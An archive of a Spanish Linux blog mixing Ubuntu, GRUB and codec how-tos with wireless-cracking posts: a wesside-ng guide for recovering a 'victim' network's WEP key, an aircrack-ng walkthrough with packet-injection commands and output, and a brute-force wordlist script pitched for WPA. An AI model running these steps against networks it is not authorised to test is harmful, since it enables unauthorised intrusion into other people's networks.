jueves, 23 de abril de 2009

Como Actualizar de Intrepid a Jaunty

Antes de comenzar

  • Tu solo puedes actualizar directamente a Ubuntu 9.04 desde Ubuntu 8.10 (ver notas)

  • Asegurate de tener todas las actualizaciones aplicadas en Ubuntu 8.10 antes de actualizar.
  • Antes de actualizar es recomendable leer las notas de lanzamiento para Ubuntu 9.04.

Actualizacion por red Ubuntu Desktops (Recomendada)

Tu puedes actualizar por la red facilmente con el siguiente procedimiento.

  1. En Sistema/Administracion/Gestor de actualizacion
  2. Click sobre Check para buscar nuevas actualizaciones.

  3. Si existe algna actualizacion hágala.

  4. Luego aparecera un mensaje avisando la disponiblilidad de una nueva distribucion.
    • um2.jpg

  5. Click en Upgrade.

  6. Siga las instrucciones en pantalla.
    • um3.jpg

Actualizar utilizando un "alternate-CD"

Use este método si no posee conexion a in Internet.

  1. Descarge el alternate installation CD

  2. queme el ISO a un CD insertelo en su CD-ROM.

    • Si el ISO esta en la computadora a ser actualizada tambien puede montar el ISO en un drive virtual con el siguiente comando:

      sudo mount -o loop ~/Desktop/ubuntu-9.04-alternate-i386.iso /media/cdrom0
  3. Le aparecera un dialogo ofertando la actualizacion por CD.
  4. Siga las instrucciones en pantalla.

Si por cualquier razón el dialogo de actualización no aparece puede correr el siguiente comando precionándo Alt+F2:

gksu "sh /cdrom/cdromupgrade"

articulo de www.ubuntu.com

martes, 21 de abril de 2009

Buena noticia airdecloak-ng + Tkiptun-ng = WPA en 15 minutos

De un tiempo a esta parte se había oído la posibilidad de crackear, no fácil ni rápidamente, la encriptación WPA de la red Wifi. A día de hoy, han puesto en práctica un método que ha roto la seguridad en apenas 15 mintuos.

La encriptación WPA es la que a día de hoy ofrece más seguridad en la encriptación de la señal WIFI, muy por encima de la encriptación WEP, y es la usada por redes empresariales. No obstante, este método no rompe la encriptación WPA2 según indican los desarrolladores.

El hueco para romper la protección ha sido encontrado en Temporal Key Integrity Protocol (TKIP - Protocolo temporal de integridad de clave) y, como avanzábamos, permite romper la seguridad entre 12-15 minutos.

El método usado no es el de ataque diccionario, con el que hasta la fecha era conocida su efectividad pero usando grandes recursos de hardware y bastante tiempo, sino que se ha basado en un avance matemático que será expuesto en una conferencia el próximo mes. No obstante, podemos ver un avance de la técnica aquí.

http://software.adslzone.net/2008/11/07/crackeada-la-seguridad-wpa-de-la-wifi-en-15-minutos/
Los links nos manda ala web oficial de aicrack-ng donde la confirman.
Para los que quieran profundizar y adelantarse a la publicacion entera de la tecnica:
http://arstechnica.com/articles/paedia/wpa-cracked.ars/1

http//:foro.segurdadwireless.net/

lunes, 20 de abril de 2009

Como hackear una red inalambrica con Wesside-ng

Las redes inalámbricas son vulnerables a multiples ataques para consiguir acceso, una buena aplicación para este fin es "Wesside-ng" de la suite "Aircrack-ng", está diseñada para un uso facil y rapido y sin la necesidad de tener mucha experiencia
solo basta con escribir en una terminal
wesside-ng "opciones" "interfaz de red"
y en minutos tendremos la clave HEX que este encriptada con WEP a mano.
.
El primer paso es poner la interfaz de red inalambrica en modo monitor con iwconfig "interfaz" mode monitor ó airmon start "interfaz"


El nombre de nuestra interfaz lo podemos ver con el comando "iwconfig" y la direccion mac de la victima la podemos obtener con "airodump-ng" ejecutandolo de esta forma.

airodump-ng "interfaz"

Esta son las opciones disponibles del wesside-ng

-h : help screen
-i : Interface to use (mandatory)
-m : My IP address
-n : Network IP address
-a : Source MAC Address
-c : Do not crack the key
-p min prga> : Minimum bytes of PRGA to gather
-v : Victim BSSID
-t : Cracking threshold
-f : Highest scanned chan (default: 11)
-k : Ignore acks and tx txnum times

osea que el modo se uso sería

wesside-ng -i "interfaz" -v "mac_victima"

y en caso de recibir el error "ERROR Max retransmists for (30 bytes)" utilizar la opcion "-k 1" entonces el comando sería de esta forma.

wesside-ng -i "interfaz" -v "mac_victima" -k 1






sábado, 7 de febrero de 2009

Reproducir rmvb y otros tipos en Ubuntu con Mplayer

Hoy tuve la necesidad de reproducir un archivo rmvb, tipo real media player, y como utilizo linux y no tenia un reproductor real media pues tuve que encontrar la solucion para verlo con un reproductor en linux, aqui estan los pasos:

Configurar el repositorio medibuntu:

wget http://www.medibuntu.org/sources.list.d/hardy.list -O /etc/apt/sources.list.d/medibuntu.list

Agregar el ‘keyring’ del repositorio:

apt-get update && sudo apt-get install medibuntu-keyring && sudo apt-get update

Instalar los paquetes de codecs,si es de 32 o de 64 bits el sistema operativo se debe cambiar el nombre del paquete wXXcodecs:

apt-get install w64codecs libdvdcss2 non-free-codecs libstdc++5

Escrito el Junio 3, 2008 a las 9:32 AM por Camilo Nova

miércoles, 4 de febrero de 2009

Solucion de problemas al instalar windows

Tienes problemas de incompatibilidad al instalar windows vista?
he aqui la solucion, observa los pasos atentamente.



gracias a: madx776 por enviar el link.

viernes, 30 de enero de 2009

The Linux Counter

Te invitamos a formar parte, registrarte y registrar tus computadoras con GNU/Linux

http://counter.li.org/

lunes, 19 de enero de 2009

Bruteforce Script exelente para WPA/WPA2

Buscando por la red encontre este exelente script para crear diccionarios "lista de combinaciones posibles para x numero de caracteres"

codigo:

#!/usr/bin/python
#
# :: Invasion Tux
# :: Script realizado por makiolo (makiolo@gmail.com) (Licencia GPL)
# :: Ultima version : http://blogricardo.wordpress.com/2008/12/28/script-para-generar-diccionarios-de-fuerza-bruta/
# :: Dependencias : python
#

import sys, math
from time import time, localtime, strftime

########################### CONFIGURACION #########################

LONGITUD = 8
ALFABETO = "abcdefghijklmnopqrstuvwxyz0123456789"

####################################################################

########################## FUNCIONES ###############################
def getVariacionesConRepeticion(ALFABETO , LONGITUD):
sumatorio = 0
for i in range(LONGITUD):
producto = 1
for j in range(i+1):
producto = producto * len(ALFABETO)
sumatorio = sumatorio + producto
return sumatorio
####################################################################

##################### VARS AUXILIARES ##############################
DEBUG = True
VERBOSE = True
variacionesConRepeticion = getVariacionesConRepeticion(ALFABETO , LONGITUD)
inicioReloj = time()
cont = 0
progreso = 0
####################################################################

while LONGITUD > 0:
try:
contadores = [] # ponemos los contadores a 0
for i in range(LONGITUD):
contadores.append(0)

fin = False
while not fin:
if DEBUG == True:
for i in range(LONGITUD):
sys.stdout.write(ALFABETO[contadores[i]])
sys.stdout.write("\n")

if VERBOSE == True:
if (cont % 600000 == 0) and (cont != 0):
progreso = cont*100.0/variacionesConRepeticion # porcentaje hasta ahora
progreso = round(progreso , 2)
finReloj = time() - inicioReloj # finReloj es lo que esta tardando el calculo
velocidad = cont / finReloj # palabras procesadas por segundo
velocidad = round(velocidad , 2)
estimado = finReloj * variacionesConRepeticion / cont # es lo que se estima en realizar todo el proceso
restante = estimado - finReloj # es lo que se estima en realizar lo restante
restante = restante / 60 / 60 # lo pasamos a horas
restante = round(restante , 2)
sys.stderr.write(str(progreso)+"% - Quedan "+str(restante)+" horas. La velocidad es de "+str(velocidad)+" palabras/seg\n")

cont = cont + 1
actual = LONGITUD - 1 # Pongo actual a la derecha del todo
contadores[actual] = contadores[actual] + 1 # Sumo 1 a las unidades

while(contadores[actual] == len(ALFABETO)) and not fin: # Propago el carry
if(actual == 0):
fin = True # FIN
else:
contadores[actual] = 0 # reinicia el actual contador
actual = actual - 1 # avanza a la izquierda
contadores[actual] = contadores[actual] + 1 # y le sumo 1

LONGITUD = LONGITUD - 1 # combinaciones para uno menos

except KeyboardInterrupt:
sys.stderr.write("Interrumpido por el usuario\n")
fin = True # Fuerzo las condiciones de salida
LONGITUD = 0

if VERBOSE == True:
sys.stderr.write("Terminado al "+str(progreso)+"% - Realizadas "+str(cont)+" combinaciones de "+str(variacionesConRepeticion)+"\n")


Podemos cambiar los caracteres a usar a nuestro gusto y el largo de la combinacion donde dice "LONGITUD"

domingo, 18 de enero de 2009

Jaunty Jackalope viene con ext4 por defecto

Ya está disponible en las releases diarias de Ubuntu Jaunty Jackalope el sistema de ficheros Ext4 disponible en el Kernel de Linux a partir de la versión 2.6.28 y viene en el CD de la Alpha 3 que salio el dia 15 de Enero por lo que al realizar la partición podrá elegirse el sistema de ficheros Ext4.

Ext4 como antes mencionamos en el pasado post está diseñado para proporcionar un mejor rendimiento y aumentar la fiabilidad. También aumenta el tamaño máximo de archivos a un Exabyte y reduce la cantidad de tiempo que se requiere para llevar a cabo una operación fsck.

En Phoronix han realizado una prueba de rendimiento con una instalación de Ubuntu 9.04 y el sistema de ficheros Ext4 destaca en la IOzone, la prueba que escribe un fichero de gran tamaño.

ext4prueba

Además se anuncia que esta Alpha 3 de Ubuntu vendrá con X.org versión 1.6

También han incluido un nuevo sistema de notificaciones similar a iconos emergentes en el escritorio. Puede verse un vídeo de muestra en este enlace

Quien desee realizar pruebas podrá descargarla aqui

http://cdimage.ubuntu.com/releases/jaunty/alpha-3/ (Ubuntu)

fuente: http://jvare.wordpress.com

viernes, 16 de enero de 2009

Kernel 2.6.28 con soporte ext4!!!

La versión 2.6.28 del kernel Linux fue lanzada el 25 de diciembre, justo el día de navidad, con interesantes mejoras como el sistema de archivos ext4 que ha dejado de ser experimental.
Desde el sitio de kernelnewbies nos dejan conocer de manera detallada las nuevas características de esta versión, la cual contiene el soporte en fase estable de ext4, el nuevo sistema de archivos que promete mejor estabilidad, más características y performance. De ext3 a ext4 existe una mejora sustanciosas, contrario a lo que fue ext2 de ext3.
Una de las características de este nuevo sistema de archivos es que se puede pasar de ext3 a ext4 sin mayor dificultad y sin perdida de datos.
Otra de las mejoras en el kernel es el nuevo administrador de memoria GPUs GEM el cual se presume será una revolución al soporte gráfico de Linux.

kernel GNU/Linux con menos errores que su competencia.

De acuerdo a un estudio realizado por la Universidad de Stanford el kernel Linux tiene menos fallos en su código fuente que el software propietario.
Aunque este hecho es uno de los puntos principales que han defendido los usuarios del sistema Linux, el informe da a conocer datos precisos sobre el análisis realizado al kernel y la comparación con software propietario.
Según la publicación Wired se analizo el kernel Linux 2.6 presente en productos de la mano de Red Hat, Novell y otras empresas similares encontrando 985 fallos en 5.7 millones de lineas de código. En contra parte Windows XP, presenta fallos mucho más frecuentes en sus 40 millones de lineas de código.
De acuerdo a la Universidad Carnegie Mellon la mayoría del software propietario contiene de 20 a 30 bugs por cada 1,000 lineas de código lo que vendría a ser un aproximado de 114,000 a 171,000 fallos en 5.7 millones de lineas de código de seguir esta tendencia, mientras que el estudio arroja 0.17 bugs por cada 1,000 lineas de código en el kernel Linux.
De los 985 fallos la mayoría estuvieron en partes críticas del kernel. De estos, 569 pueden hacer que el sistema se crashe, 100 son fallos de seguridad y 33 influyen en el rendimiento del sistema. No obstante, se menciona que la mayor parte de estos fallos ya han sido corregidos actualmente.
El proyecto de análisis de código comenzó en el 2000 en la Universidad de Stanford y actualmente continua adelante con la finalidad de dar a conocer los resultados a la comunidad de desarrollo de Linux para ayudar en su mejora.
Seth Hallem, parte del proyecto de análisis de código, comenta:
“Nuestros hallazgos muestran que Linux contiene una muy baja tasa de defecto y es la prueba de la fuerte seguridad de Linux (…) Muchos agujeros de seguridad en el software son el resultado de errores de software que puede ser eliminados con una buena programación de procesos.”.
El artículo completo en: Linux: Fewer Bugs Than Rivals.

sábado, 25 de octubre de 2008

Servidores Linux mejor desempeño que servidores microsoft

WatchMouse supervisó el rendimiento de más de 1500 sitios web europeos de distintos sectores económicos. Se comprobó que la mayoría de los sitios elegidos se basan en Linux o Windows y que Linux ofrece el mejor tiempo de actividad.

En lo que respecta a las plataformas de servidor web, la opinión generalizada se decide por Microsoft IIS y Apache, aunque este último rinde mejor que el primero. En el estudio ha quedado patente que, además del sistema operativo y de la plataforma de servidor web, el tiempo de actividad depende del país en que el servidor se encuentre.

Por lo general, Windows y Linux se ejecutan en más de tres cuartos de los sitios web. No obstante, existen diferencias entre países. Polonia y Alemania prefieren Linux en combinación con Apache para sus sitios web, mientras que los sitios profesionales en el Reino Unido y Suecia confían sobre todo en Windows y Microsoft IIS. Si se observa el rendimiento relativo de las distintas plataformas de servidor web, Linux desbanca con ventaja a Windows.

Uno de cada cuatro sitios web profesionales supervisados muestran un tiempo de actividad del 99,9%, lo que es suficiente para la satisfacción del cliente. Dos tercios de los sitios web muestran una disponibilidad por debajo del 99,9%, lo que supone un mínimo de 8 horas de tiempo de inactividad al año. En opinión de WatchMouse, esta cifra no es aceptable.

«Aunque las empresas incluidas en nuestro estudio parecen preferir Windows sobre Linux, nuestros resultados muestran que es preferible tener sitios web basados en Linux y Apache. El estudio ha demostrado que la mayoría de los usuarios son muy impacientes y no esperarán más de cuatro segundos a que se cargue una página», explica Mark Pors, jefe de tecnología de WatchMouse.

jueves, 23 de octubre de 2008

Como establecer imagen para el grub "Splash"


En un Grub hace falta una buena imagen de fondo por lo que te mostramos como establecer una imagen de fondo para tu Grub "Splash image"

debes editar tu archivo de configuracion de arranque menu.lst que se ubica en /boot/grub, pero antes de hacerlo crearemos una copia de seguridad del archivo

sudo -i
cd /boot/grub
cp menu.lst menu.lst_bak
nano menu.lst

al abrirse el archivo de configuracion menu.lst le agregamos.

#Splash Image!
splashimage=(hd0,0)/boot/grub/images/back.xpm.gz

debajo de las lineas

# Pretty colours
#color cyan/blue white/blue

donde (hd0,0) nos indica primer disco primera particiony la ubicacion de la imagen
si nuestra imagen esta en la segunda particion del tercer disco debe verse asi (hd2,1)/ubicaciondelarchivo.xpm.gz

el archivo debe ser extencion xpm y estar comprimido en gzip.

Como reparar el GRUB con un live cd

  1. Para recuperar el grub vamos al usar un LiveCD, que debe ser de una distro que use GRUB: Si ya tienes LiveCD de Ubuntu puede usar ese sin problemas.

  2. Suponiendo que ya tenemos LiveCD lo ponemos en el lector e iniciamos el PC desde ese dispositivo.

  3. Hacemos un directorio para montar nuestra partición con Linux:

    ~# mkdir /mnt/ubuntu /* puedes hacer el directorio que como te de la gana, mientras recuerdes cuál era.

  4. Montamos la partición con una orden de montaje convencional. En mi caso el formato de la partición es ext2, debé ser sustituirlo por el que se ajuste a nuestro caso, así como debe localizar la partición en la que tiene instalada Ubuntu (normalmente será algo como /dev/hda5, pero puede variar de un caso a otro).

    ~# mount -t ext2 partición_ubuntu /mnt/ubuntu

  5. Ahora vamos a cambiar el origen de root de nuestro sistema de archivos al directorio en el que hemos montado Ubuntu, para que al instalar grub interprete que el “/” del sistema está ahí. Para ello usamos chroot.

    ~# chroot /mnt/ubuntu/

  6. Instalamos GRUB en el MBR del primer disco duro, que normalmente estará configurado como Primary Master (hda).

    ~# grub-install /dev/hda

  7. Verificamos que todo está bien revisando las entradas que se han incluído en /boot/grub/menu.lst y si están todos nuestros sistemas (que será lo más normal) ya podemos reiniciar nuestro sistema, retirar el LiveCD y disfrutar de nuestro gestor de arranque.

martes, 21 de octubre de 2008

Descarga compiz-fusion GIT


Despues de ver este video seguro que vas a querer instalarte este plugin del Compiz-Fusion...
Una manera sencilla de hacerlo es con el script compiz-git se la siguiente forma.

Abre una terminal y escribe
sudo -i "obtenemos privilegios de administrador"
wget http://www.xs4all.nl/~mgj1/downloads/compiz-git-newest.tar.gz "descargamos el archivo"

tar xvfz compiz-git-newest.tar.gz
"descomprimimos"

cd compiz-git
"entramos al directorio"

./compiz-git install
"comenzamos proceso de instalacion"

Funciona a la perfeccion en Gutsy y Hardy

En caso de querer desinstalar

solo debes de entrar al directorio del script y hacer

sudo ./compiz-git uninstall
cd .. sudo rm -r compiz-git

mas informacion acerca de compiz-fusion y compiz-git

domingo, 19 de octubre de 2008

Como usar aircrack-ng

Con el aircrack-ng podemos probar que tan segura es nuestra red inalambrica intentando conseguir la contraseña de dicha red capturando y leyendo paquetes de su trafico. Aircrack puede desencriptar WEP, WPA, WPA2-PSK y cuenta con una numerosa cantidad de ataques y opciones para hacerlo.

Observaciones

- Debes descargar e instalar la suite aircrack-ng 1.0 (probado en esta)
www.aircrack-ng.org
- Tu adaptador inalambrico debe soportar modo monitor, la lista de dispositivos soportados esta en www.aircrack-ng.org

Pasos a seguir


- Abrir una terminal
- Adquirir privilegios de administrador escribiendo
$sudo -i

-ejecutar el comando iwconfig
#iwconfig
en la salida de este comando podremos ver el nombre de nuestra interface en mi caso esta es mi salida

lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Managed Frequency:2.437 GHz Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Power Management:off
Link Quality=0/70 Signal level=-94 dBm Noise level=-94 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Nos podemos dar cuenta que la interface es ath0 (tarjeta netgear con chipset atheros)

-Ejecutamos airmon-ng de la siguiente forma

#airmon-ng start wifi0
donde indicamos ejecutar airmon-ng "start" comenzar modo monitor "wifi0" interface, esto nos debe dar una salida como esta

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

este programa es parte de la suite aircrack-ng y será el encargado de habilitar el modo monitor en nuestra interface

donde podemos ver que se ha creado la interface ath1 que esta en modo monitor, podemos confirmar con un iwconfig

-Luego podemos ya comenzar la captura de paquetes con airodump-ng
utilizando la opcion --help tras airodump-ng podremos ver la ayuda y las opciones para el mismo

debemos ejecutar:
#airodump-ng ath1
y nos mostrara lo siguiente

CH 6 ][ Elapsed: 24 s ][ 2008-10-19 23:17

BSSID PWR Beacons #Data, #/s CH MB ENC CIP AUT ESSID

00:02:6F:4A:CC:BB 21 120 6 0 7 -1 WEP WEP mynetwork

BSSID STATION PWR Rate Lost Packets Probes

00:02:6F:4A:CC:BB 00:07:95:AC:AA:BB 46 0 -1 6 8

donde nos muestra el bssid essis datos canal encriptacion cifrado y autentificacion de la red inalambrica

pero estos datos no se estan guardando aun por lo que presionamos ctrl c para terminar el programa y especificamos al ejecutarlo que queremos guardar los datos capturados y filtrar el canal de la red de la siguiente forma -w seguido por el nombre del archivo a crear y -c para filtrar el canal de la red

en mi caso la red esta en el canal 7 por lo que escribimos

#airodump-ng -w capturas -c 7 ath1

y ya esta guardando las capturas en el archivo capturas.cap y solo nos muestras las redes del canal 7, si el trafico de esta red es muy bajo debes utilizar el aireplay-ng con sus debidas opciones para inyectar trafico a dicha red yo lo utilizo de la siguiente forma.

#aireplay-ng -1 0 -e mynetwork -a 00:02:6F:4A:CC:BB -b 00:02:6F:4A:CC:BB -h 01:07:6b:AA:CD:BB ath1
donde "aireplay-ng" ejecuta el programa "-1" indica el ataque que ene este caso es asociarse a la red "0" el tiempo "-e" el essid de la red "-a" el bssid del la red "-b" el bssid de la red y "ath1" la interface, de todo salir bien esto debe darnos una salida como esta

17:16:30 waiting for beacon frame (BSSID:00:02:6F:4A:CC:BB)
14:16:30 Sending Authentication Request
14:16:30 Authentication Successfull
14:16:30 Sending Association Request
14:16:30 Association successfull ;)
#

y aqui procedemos inyectar trafico en la red con la opcion "3", utilizamos la opcion "r" para leer el fichero que airodump esta creando y si deseamos controlar el numero de paquetes por segundo podemos agregar la opcion "x" seria algo silimar a esto

#aireplay-ng -3 -e mynetwork -a 00:02:6F:4A:CC:BB -b 00:02:6F:4A:CC:BB -h 01:07:6b:AA:CD:BB -r capturas.cap -x 200 ath1

"uso de la opcion -x" si no la utilizas automaticamente se usara por defecto la velocidad mas alta que permita tu procesador y tu adaptador wireless, si al inyectar sin la opcion -x el trafico capturado deja de aumentar preciona ctrl c en la terminal donde estas corriendo aireplay-ng y utiliza -x con una cantidad de pps mas pequeña (solo para computadoras no muy rapidas)

si todo marcha bien ya debemos ver los paquetes de capturas en aumento ahora solo queda esperar capturar 20,000 paquetes para hacer el primer ataque a nuestra WEP

al tener 20,000 paquetes capturados, ejecutamos aircrack-ng capturas.cap
luego de pasar unos segundos nos mostrara la clave encontrada, escribiendo solo aircrack-ng puedes ver las diferentes opciones y los diferentes ataques.
mucha suerte en tu prueba de seguridad para tu red,
cualquier duda o pregunta deja tu comentario.